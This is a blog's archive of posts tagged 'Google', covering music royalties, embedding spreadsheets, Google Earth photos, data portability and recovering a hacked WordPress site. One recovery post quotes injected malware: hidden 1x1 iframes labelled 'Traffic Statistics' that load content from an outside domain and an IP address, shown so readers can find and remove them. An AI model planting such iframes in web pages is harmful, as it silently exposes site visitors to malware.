Posts Tagged ‘Google’

Radio2.0 - Last.fm will pay royalties to independent musicians

Saturday, July 12th, 2008

Last.fm, a very cool online radio / music social networking site, just announced that it will pay royalties directly to independent musicians who upload their songs.

This is pretty important, for the same reason that Google’s Adsense was important (though probably a few orders of magnitude smaller impact). The Internet does a few things really, really well - quickly build network effects, encourage the creation of lots of long tail and niche content, etc. It also has the potential to cut out the middleman in economic transactions and help pay small-audience writers, artists, and musicians, so long as there’s a viable monetization system.

Adsense is that monetization system for a huge number of web sites, and hopefully things like Last.fm’s royalty program and CDBaby will be the engine that drives more interesting music online.

By the way, I started the Geek Music group a few years ago.  Feel free to join, your listening habits will help us determine the best music to put on when writing code.

Sphere: Related Content

Embedding Google Docs and Spreadsheets into your Blog Posts

Sunday, July 6th, 2008

I just wrote a post about buying a new camera, and because I want to compare specs on several different cameras and lenses, I’m going to need a spreadsheet.  Luckily there are some great online spreadsheet programs to chose from.  I’m going to use this as an opportunity to explore how to use Google Docs and Spreadsheets in blog posts.

Before you get started I’m assuming you already have a Google Docs spreadsheet ready to go.

1.  You can always just link to the document. By default your docs will be private so you’ll need to make them available to your readers.  To do so you’ll need to either go to the Share tab and check “Anyone can view this document WITHOUT LOGGING IN at:” or go to the Publish tab and publish the doc. Either way you’ll get regular URL to post, like this one:  http://spreadsheets.google.com/ccc?key=ppevxmL24UqmeiZSbqIU1DQ&hl=en

Links aren’t very exciting though, so how can you embed into a post instead?

2.  You can embed the content into the post.  If you’re wondering how to do it in Wordpress, one solution I’ve come across is the Inline Google Docs plugin at Broken Watch.  This plugin gets the actual text/html of the spreadsheet and places it inline in your post.  So if you have a wide blog template, or a spreadsheet with relatively few columns, it should blend right in.  On the other hand, there’s no editing or other fun.

Here’s an example of what the output looks like:

CameraMPixLenswidetelezoomstabilized / VRweight (lbs)lens $total (lbs)total $
Nikon CoolPix 57005-352808N1.1
Nikon D406.1$430
Nikon D6010126 x 94 x 64 mm (5.0 x 3.7 x 2.5 in)1.2$600
NikonAF-S DX Nikkor 18-135mm f/3.5-5.6G VG181358Y0.85$260
NikonAF-S DX VR Zoom Nikkor 18-200mm f/3.5-5.6G ED-IF 1820011Y1.2$650http://www.dpreview.com/lensreviews/nikon_18-200_3p5-5p6_vr_afs_n15/
NikonTamron 18-250mm F/3.5-6.3 AF Di-II LD Aspherical (IF) Macro Lens1825014N1$415
NikonTamron AF 28-300mm f/3.5-6.3 XR Di LD VC (Vibration Compensation) Aspherical (IF) Macro Auto Focus Zoom Lens2830011Y1.3$540
NikonSigma AF 18-200mm f/3.5-6.3 DC OS (Optical Stabilizer) Zoom Lens1820011Y

3.  You can put the doc directly in the page with an iframe. This works really, really well with Google Presentations but is a bit trickier with a doc and even less optimal with a spreadsheet. You’ll get the best-looking results if you publish the document and use the published URL in the iframe. On the other hand if you use the shared URL collaborators should be able to make changes right in your blog post.

You’ll want to create some code like this:

<iframe src=”http://spreadsheets.google.com/pub?key=ppevxmL24UqmeiZSbqIU1DQ” width=”500″ height=”400″></iframe>

Make sure you put the code in the “HTML” editing mode of Wordpress rather than “Visual” mode.  As a result you can see some of the info I’ve gathered about possible camera / lens combinations in the spreadsheet below.

The main issue here is the relatively small iframe window size. If you use a wider blog template this technique might work really well.

Why bother? Spreadsheets aren’t the most exciting thing in the world for most people, but play around with all the features of Google Docs and Spreadsheets and you’ll see why this can be pretty cool.  You can embed questionnaires and surveys, cool charts and graphs with Gadgets, and anything else you can think of.

Sphere: Related Content

Great video on how to get your site back in Google

Friday, July 4th, 2008

Earlier I wrote a bit about what to do when your site has been hacked or spammed to the point where Google and Firefox start warning visitors away from your site.  If you find you site deleted from Google search results completely, you’ll want to file a reconsideration request.

Luckily, the Google Webmaster Central blog has a great post on how to make a request to get back into Google.  The post includes a step-by-step video.  You can also check out the Google Webmaster Help group if you have questions.

Sphere: Related Content

Google Earth vs. Reality, Revisited

Friday, June 6th, 2008

Last week I compared some real-life photos with the same scene in Google Earth.  Since I’m a bit of a computer/mapping/photography geek, I couldn’t resist doing a few more.  That actually ended up being a pretty popular post, with thousands of pageviews, which just goes to show I’m not the only combination computer/mapping/photography geek out there.

Here’s a view of San Francisco from Coit Tower on Telegraph Hill.  Follow this link to see larger versions in Flickr.  This one is even better than the two from last week - look how well the streets, buildings, and Golden Gate Bridge match with the photo.

Google Earth vs. Reality - San Francisco from Coit Tower

Now I’ll go a little more international.  Here’s a photo from the site of ancient Mycenae in Greece.  This is above the famous Lion Gate looking out tat the hills surrounding the Argolid plain.  See larger versions in Flickr.  The aerial photograph that Google Earth maps to the topography isn’t as detailed as the real life photo, but even the borders of the olive groves line up.

Google Earth vs. Reality - Mycenae, Greece

These next two are not as identical as the San Francisco cityscapes, but are still impressive because of how well they evoke the real life scenes without 3-d buildings.

The first is from the Acropolis in Athens, looking out over the surrounding neighborhood.  Larger versions in Flickr.

Google Earth vs. Reality - Athens from the Acropolis

Here’s another shot from the Acropolis showing the new Acropolis Museum.  Larger versions in Flickr.

Google Earth vs. Reality - Athens and the new Acropolis Museum

If you feel like making some comparisons of your own, please let me know in the comments below - I’d love to see what other people could come up with.

Sphere: Related Content

The Ethics of Web Apps, or, Ever try to get a list of your contacts from Facebook?

Sunday, April 20th, 2008

Jagged path Even before I worked at Google, I was pretty impressed by the “don’t be evil” motto.  Not that I think any company is perfect or that anyone can hire only saintly employees - but it’s impressive when anyone recognizes the ethical implications for what we do as programmers and web developers.

Now that I work there, I can tell you that everyone really seems to take it to heart (disclaimer:  this is my personal blog and I am not representing my employer in any way).  At this point, you may be asking, “programs are just lists of instructions, web sites are just products, what’s the ethical dilemma?”

I’ll give you an example.

I’m a big fan of Facebook, I think they’ve really done a great job building a social networking system, and it’s been very useful for keeping up with friends all over the world.  But I also have an account at LinkedIn, and Flickr, and Yelp, and an address book in Thunderbird, and another on my iPhone, and…  you get the picture.  So I’m trying to collect all my contacts together in one system (Gmail) so I can just import/export to keep all these different social networking systems up to date.

But Facebook doesn’t have a function to export a list of contacts and email addresses.  What’s more, they’ve apparently actively blocked attempts by developers to build systems to do it and disabled people’s accounts.

They are, of course, not legally obligated to let you export your contacts.  And if I were building a social networking site, it probably wouldn’t be the first feature I would implement.  But ethically, I think, they should do so.  Why?  We can refer to Kant’s categorical imperative or Jesus’ golden rule:  They should build open systems because they would like other systems to be open.

They certainly take advantage of the openness of other systems, allowing you to import contacts from Gmail.  Google’s social networking site, Orkut, will happily export your contacts, and I don’t think that’s an accident.  The engineers and product managers at Google make conscious choices to do the right thing.

But wait…  am I really asking them to make it easy for their users to take their data and go over to a competitor?  Isn’t that a bad business practice?

It’s possible, but beside the point.  I’m sure you and I could think of plenty of things that are profitable but morally repugnant.  What’s more, I don’t think it is a bad business practice at all.  I think that the walled garden approach is a sign of desperation rather than innovation.  Orkut is not the only one that lets you take your data with you - LinkedIn allows exports, for example.

Paul Graham wrote a really interesting post about this recently:

When you’re small, you can’t bully customers, so you have to charm them. Whereas when you’re big you can maltreat them at will, and you tend to, because it’s easier than satisfying them. You grow big by being nice, but you can stay big by being mean.

If you’d like to read more about this subject and see what some developers are doing to make your data more portable, check out DataPortability.org.

Sphere: Related Content

Announcing Localographer: find an apartment or house with Google Maps

Monday, April 7th, 2008

Localographer logo Earlier I wrote about using Photoshop to create a heat map and to use data maps when house hunting.  I got a pretty good response to those tutorials but the process is a little too labor intensive for most.  So when I moved to California, I decided to do something similar, using the Google Maps API, so that it would be easy for anyone to make their own heat map.So here it is:  Localographer - build interactive heat maps for house and apartment hunting.  You can see a screenshot below:Screen shot of a Bay-area heat map from LocalographerLocalographer is a beta release right now, so watch out for bugs and random downtime.  Also, I have to add a disclaimer:  this is not an official Google project, this is something I did on my spare time.  In fact, most of the work was done before I started working at Google in preparation for our move to California.The site takes you though a series of steps to build your map:

  1. Pick your city and create your map;
  2. Add places you’d like to be near (like your job or your school);
  3. Add potential locations (houses, apartments, condos) to see how they compare.

I’ve got a ton of ideas for additional functionality, so hopefully I’ll have time to add more in the next few weeks.  I’ll also be working on the site’s design, making it a bit more usable and interactive.Here’s how a map in Localographer compares to my Photoshop heat map of the Cleveland area (click on the images to see larger versions):Screen shot of a Cleveland-area heat map from Localographer   Heat map we used for house hunting, with hotspots placed at locations we need to drive toIn case you’re interested, the site was developed in PHP with a MySQL database.  The maps use the Google Maps API with some hand-written functions to correctly draw the hot spots.Please take a look and let me know what you think.  Post and problems, bugs, or new feature ideas in the comments below.  Later I’ll post a poll so you can vote on new features and other enhancements.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in it’s own right so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever- by serving a 410 (gone). You can do this with any server-side language, my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php header("HTTP/1.1 410 Gone");
header("Status: 410 Gone");?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.exmaple.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automtically like if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

Sphere: Related Content

What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and few few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my sites good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So Stopbadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses Wordpress and allows user comments. A bad link to show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness as upgrading Wordpress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to here back on my review, I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.

Sphere: Related Content

Why I am sharing my photos with a Creative Commons License

Wednesday, February 13th, 2008

DSCN0563 I do a bit of amateur photography.  I’m not very strong technically and I don’t have particularly good equipment, but I enjoy finding interesting angles and compositions.  I’ve been putting up photos on Flickr for a while to share them with friends and the public.  I also have an account on Panoramio with some photos that show up in Google Earth.

No matter the particular photo site used, sharing photos online has been a great experience.  I’ve had a number of encouraging comments on my photos and people have emailed me to ask if they could use a photo in a report for school or a pamphlet for their non-profit.

When I signed up with Flickr I noticed they had options to add Creative Commons licenses to photos by default.  I’m more than happy to let people use my photos for noncommercial purposes, so why didn’t turn on Creative Commons licensing from the start?

Part of it was the number of options available.  Creative Commons licensing allows other people to share your work but it’s not the same thing as releasing the copyright or putting photos in the public domain.  You have some options:  do you want people to be able to make money off your work, or do you just want it available for non-profits, educational, and personal use?  Do you want people to be able to alter and remix your work or just present it as-is?

DSCF0662 So I was a bit struck by the paradox of choice and decided to skip ahead and start uploading photos.  In retrospect, that was a mistake.

There’s a great page at the Creative Commons site that explains the options.  I am going to license my photos with an Attribution Non-commercial (by-nc) license.  That license covers my default attitude about my amateur photography - everyone is welcome to use my photos for non-commercial purposes, so long as they give me credit. This is, of course, in addition to fair use rights that people already have.

Another important point:  it doesn’t mean people can’t use it commercially, they just have to contact me and get permission.  Depending on the use, I might put a price on it.  And I can always sell prints or make products myself.

I might even switch over to allow commercial use as well, if I can get over my delusions of being the next Ansel Adams.

San Francisco skyline and flowers The abuse and incessant extension of copyright might not seem like a life-or-death issue, but it’s one of those issues where technology and public policy are inextricably linked.  It’s like the problem of software and business method patents.  There’s a great story by Spider Robinson that illustrates what happens if taken to extremes.

So take a look at the licenses and consider applying the appropriate copyleft to your work.

Sphere: Related Content

The iPhone, Google Maps for Mobile, and e911 - where is the disconnect?

Wednesday, November 28th, 2007

DSCN0592Google Maps for Mobile will soon include a GPS-like ability to find your current location.  A little while ago Gizmondo wrote about an iPhone hack that allows almost, but not quite GPS functionality.  The hack itself sounds a lot like the way phase II of the wireless E911 service works, and my guess is that Google Maps is fairly similar.

If you take a look at this map, you can see than many states have > 80% deployment.  On the FCC site you can find reports of the e911 deployments completed by cell phone companies.  Any company that doesn’t have over 95% of their customers with E911 capable handsets is currently getting fined.  So it’s a shame that Google and random iPhone hackers have to reimplement all this.

I’ve never worked on E911 support (or anything cellular, for that matter), but it seems to me there is an incredible opportunity here.  One of the great things about the iPhone is that it drives adoption of data plans.  How about including psuedo-GPS capability in nearly every phone as soon as you sign up for a data plan?  That would be a huge incentive.

Here’s an even more radical idea:  why not come up with a standard way to communicate presence and location data so users can do things like local search?  It might take use years and millions of dollars to develop proprietary systems to do this, but if we use an open standard perhaps this could be adopted as quickly as things like the web and email.

Even better, operating under an open standard will allow geeks in garages all over the world to develop new social software systems we can’t even dream of.

Sphere: Related Content

Picasa vs. iPhoto vs. Flickr vs. Panoramio

Sunday, June 17th, 2007

Ledges along Doan Brook in ClevelandEarlier I mentioned that I have some photos uploaded to Panoramio. I’ve also played with Flickr off and on, and have recently started uploading some photos there as well. To add to the confusion, I use Picasa to manage photos on my hard drive, and my wife uses iPhoto on her Mac. Picasa has a web albums feature, and I’m sure iPhoto has something similar with a .Mac account.

Why use four different services that overlap each other to such a degree? Picasa and iPhoto both do the important job of managing photos locally, Flickr seems to have the largest community and the most widgets written for it, and Panoramio integrates with Google Earth. Since I want to do all those things, I have to use them all.

There are ways to make them play nice together. You can use a Gmail account to email photos from Picasa to Flickr, and so far it seems to work fairly well. There are a few iPhoto plugins to upload to Flickr and you can use iPhoto to subscribe to Flickr photostreams. Google just bought Panoramio, so I’m sure there will be more integration there soon as well.

Even with all these options, there are some annoyances. Picasa’s keyword tagging is not very useful, it only allows one-word tags. I tried creating multi-word tags with dashes or by enclosing them in quotes, but Picasa ate the special characters. There’s also the complication of managing public photos vs private photos.

Still, it is amazing how well these different websites and programs work together, through the magic of RSS, web API, and plain old email.

If you’d like, you can see my Flickr photos here. You can also see my photos in Panoramio, or just look close enough in Google Earth, since a few of my photos now how up there.

Sphere: Related Content

Notes: Why are online catalogs still hard to use?

Wednesday, June 22nd, 2005

Borgman, C.L. (1996). Why are online catalogs still hard to use? Journal of the American Society for Information Science, 47 (7): 493-503. 

In this 1996 study, Borgman revisits a 1986 study of online library catalogs. In the original study, computer interfaces and online catalogs were still fairly new—the study looked at how the design of traditional card catalogs could inform the design of new online catalogs. By the time of this study online catalogs were common but still not easy to use. Three kinds of knowledge were seen as necessary for online catalog searching: conceptual knowledge about the information retrieval process in general, semantic knowledge of how to query the particular system, and technical knowledge including basic computer skills. Semantic knowledge and technical knowledge differ here in the same way as semantic and syntactic knowledge in computer science. The study also covers specific concepts like action, access points, search terms, boolean logic, and file organization. In the short term, Borgman recommends training and help facilities to help users gain the skills they need to use current systems. In the long run, though, libraries must employ the findings of information-seeking process research if they are ever going to create usable interfaces.

The study does point out a number of reasons why online catalogs are difficult for users, whether it’s because they lack computer skills or semantic knowledge. One good example is from a common type of query language. Even if the user knows that “FI” means “find” and “AU” means author, they may not know whether to use “FI AU ROBERT M. HAYES,” “FI AU R M HAYES,” “FI AU HAYES, ROBERT M,” etc., and how the results will differ. Unfortunately the article lacks clear instructions or examples of how to make the systems better. The conclusion that different types of training materials could be helpful seems to me like a bandage rather than a cure.

I think a lot of the criticisms are still true, but that modern cataloging and searching systems have become easier. I’m not so sure it’s because catalog designers have started applying information-seeking research in their interfaces, though. It almost seems like library systems are being made easier in self-defense. Users are getting more and more used to a Google or Yahoo type interface—a simple search box that looks at full text and uses advanced algorithms to find relevant results. I think part of this is due to the fact that people in the library field have experience with complicated, powerful structure search systems and are used to a lot of manual encoding of records. Web developers, lacking this background, have been more free to think in terms of searching massive amounts of unstructured data and automating the collection and indexing process. I also think that simple things such as showing the results, including summaries of each item, in a scrollable, clickable list, have helped a great deal to support the information seeking process. Things like search history and “back” and “forward” buttons, “search within these results,” automatic spell checking, etc. are becoming pretty standard as well.

Sphere: Related Content

Notes: Helping people find what they don’t know

Tuesday, June 14th, 2005

Nicolas J. Belkin, Helping people find what they don’t know, Communications of the ACM, v.43 n.8, p.58-61, Aug. 2000

In this article, Belkin argues that since people generally start searching for information when they don’t know much about a subject. It is therefore problematic that many search systems require knowledge of the domain in order to get good results, for example when users do not know either the specific keywords or controlled vocabulary of the system. His group feels that the best way around this is for the system to make suggestions along the way. There are two techniques that can be used: system-controlled, where the user’s query is enhanced automatically by the system using algorithms like word frequency, and user-controlled, where the user is given the results of their query along with suggestions to make it more effective. The author’s team found that suggestions were most effective when the user was able to control which suggestions were used and when the user knew how the suggestions were generated and was comfortable with the results.

The author’s findings seem both intuitive and promising. It makes sense that in an interactive structured searching system giving the user suggestions and allowing them to take them or leave them would work well, and the suggestions should neither be bizarre or mysterious. But with the rise of the World Wide Web, I think it’s pretty clear that users with less domain knowledge prefer less-structured searching environments. In my experience, users who are new to a system will type unstructured, keyword queries into anything that even looks like a search box, even if it is clearly labeled as a field for author name, product code, or start date. Power users, on the other hand, often have more knowledge about the data then the system’s programmers—so for these sorts of suggestions to be useful, the algorithm would need to do more than just call up synonyms. The article makes it clear that these findings are early, so I would be interested to see what they have come up with since 2000.

These ideas could be applied to both structured and unstructured searching environments, though my guess is that they would be easier to implement in more structured environments because the structure of the system can be used to generate the suggestions. There certainly have been a number of projects which have tried to provide something like this with general web searching. Rudimentary systems like Google Suggest  or more advanced ones like Teoma show off the potential. Notice, however, that neither of these has exactly taken the search engine industry by storm, meaning people are apparently happy to muddle along with plain keyword searching and advanced ranking algorithms. I do wonder if their finding that users liked to have some idea about how suggestions were found would apply here as well—would users be happier with Google if they were told why PageRank picked a certain site as the number one result? Since the algorithms used by Google, Yahoo, MSN and others are trade secrets I doubt we’ll see anything like that in the near future. On the other hand, Amazon.com’s recommendation engine does tell the user why a certain book was suggested, and allow the user to remove certain suggestions. Although it is not really a search tool, it follows the precepts discussed here and seems to be successful.

Sphere: Related Content